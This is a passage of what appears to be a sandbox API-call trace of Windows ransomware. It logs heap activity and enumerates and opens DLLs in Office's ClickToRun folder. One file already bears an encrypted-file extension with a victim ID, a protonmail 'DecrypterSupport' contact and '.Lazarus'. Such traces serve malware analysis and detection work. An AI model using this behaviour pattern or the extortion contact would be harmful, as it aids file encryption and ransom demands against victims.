(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81580 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0092.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0092.514] AreFileApisANSI () returned 1 [0092.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0092.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0092.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8b078, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0092.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80acba0b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80acba0b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x903435ee, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x22e0a8)) returned 1 [0092.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0092.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0092.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0092.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.638] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.638] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x8a8d8, dwReserved0=0x327f590, dwReserved1=0x2000002, cFileName="AppVIsvVirtualization.dll", cAlternateFileName="AP485B~1.DLL")) returned 1 [0092.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0092.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0092.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0092.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0092.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0092.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0092.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0092.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0092.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0092.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0092.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0092.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0092.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0092.659] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0092.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0092.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0092.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0092.660] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0092.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0092.660] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0092.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0092.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0092.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0092.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0092.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0092.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0092.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0092.673] AreFileApisANSI () returned 1 [0092.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll", lpUsedDefaultChar=0x0) returned 84 [0092.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0092.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0092.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0092.673] AreFileApisANSI () returned 1 [0092.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0092.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5fb08 [0092.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x5fb08, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 84 [0092.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.674] GetFileType (hFile=0x33c) returned 0x1 [0092.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fb08 | out: hHeap=0x20000) returned 1 [0092.674] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.674] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.674] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.674] CloseHandle (hObject=0x33c) returned 1 [0092.675] AreFileApisANSI () returned 1 [0092.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0092.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60348 [0092.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x60348, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 84 [0092.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.675] GetLastError () returned 0x20 [0092.675] GetLastError () returned 0x20 [0092.675] SetLastError (dwErrCode=0x20) [0092.675] GetLastError () returned 0x20 [0092.675] SetLastError (dwErrCode=0x20) [0092.675] GetLastError () returned 0x20 [0092.675] SetLastError (dwErrCode=0x20) [0092.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0092.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0092.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0092.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.675] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.675] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x12cad8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVManifest.dll", cAlternateFileName="APPVMA~1.DLL")) returned 1 [0092.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0092.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0092.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0092.676] AreFileApisANSI () returned 1 [0092.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll", lpUsedDefaultChar=0x0) returned 75 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0092.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.676] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0092.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0092.677] AreFileApisANSI () returned 1 [0092.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0092.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85120 [0092.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 75 [0092.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0092.677] GetFileType (hFile=0x33c) returned 0x1 [0092.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0092.677] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0092.677] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0092.678] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0092.678] CloseHandle (hObject=0x33c) returned 1 [0092.678] AreFileApisANSI () returned 1 [0092.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0092.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85da0 [0092.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 75 [0092.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.678] GetLastError () returned 0x20 [0092.678] GetLastError () returned 0x20 [0092.678] SetLastError (dwErrCode=0x20) [0092.678] GetLastError () returned 0x20 [0092.678] SetLastError (dwErrCode=0x20) [0092.678] GetLastError () returned 0x20 [0092.678] SetLastError (dwErrCode=0x20) [0092.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0092.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0092.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.679] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: 